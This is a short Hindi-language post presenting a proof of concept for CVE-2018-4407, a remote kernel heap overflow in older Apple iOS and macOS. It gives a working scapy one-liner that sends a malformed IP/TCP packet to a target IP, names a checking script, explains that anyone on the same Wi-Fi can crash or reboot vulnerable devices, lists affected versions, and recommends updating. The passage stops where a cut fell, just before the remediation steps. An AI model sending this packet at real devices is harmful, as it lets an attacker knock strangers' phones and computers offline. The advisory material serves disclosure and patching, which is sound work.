
iOS 12 / OS X रिमोट कर्नेल हीप ओवरफ्लो (CVE-2018-4407) POC
*iOS 12 / OS X दूरस्थ कर्नेल हीप ओवरफ़्लो (CVE-2018-4407) POC:
pip install scapy
sudo scapy
send(IP(dst=“Target IP“,options=[IPOption(“A”*8)])/TCP(dport=2323,options=[(19, “1"*18),(19, “2”*18)]))
या स्क्रिप्ट का उपयोग करें
python check_icmp_dos.py 127.0.0.1
यह भेद्यता हमलावर को उसी Wi-Fi नेटवर्क से जुड़ने की अनुमति देती है, फिर वह अनजान उपयोगकर्ताओं को दुर्भावनापूर्ण पैकेट भेजकर किसी भी Mac या iOS डिवाइस को क्रैश या रीस्टार्ट कर सकता है। चूंकि यह भेद्यता सिस्टम नेटवर्क कोर कोड में मौजूद है, इसलिए कोई भी एंटीवायरस सॉफ़्टवेयर इससे बचाव नहीं कर सकता।
निम्नलिखित ऑपरेटिंग सिस्टम चलाने वाले डिवाइस असुरक्षित हैं:
Apple iOS 11 और पुराने संस्करण: सभी डिवाइस (iOS 12 में अपग्रेड किए गए कुछ डिवाइस)
Apple macOS High Sierra (प्रभावित उच्चतम संस्करण 10.13.6): सभी डिवाइस (सुरक्षा अपडेट 2018-001 द्वारा ठीक किया गया)
Apple macOS Sierra (प्रभावित उच्चतम संस्करण 10.12.6): सभी डिवाइस (सुरक्षा अपडेट 2018-005 में ठीक किया गया)
Apple OS X El Capitan और पुराने संस्करण: सभी डिवाइस
फिलहाल, Apple ने इस भेद्यता को ठीक करने के लिए iOS 12.1 संस्करण अपडेट जारी किया है। उपयोगकर्ताओं को सलाह दी जाती है कि वे अपने सिस्टम संस्करण की जाँच करें और यदि प्रभावित हैं, तो तुरंत सुधारात्मक उपाय करें। भेद्यता को ठीक करने के उपाय इस प्रकार हैं: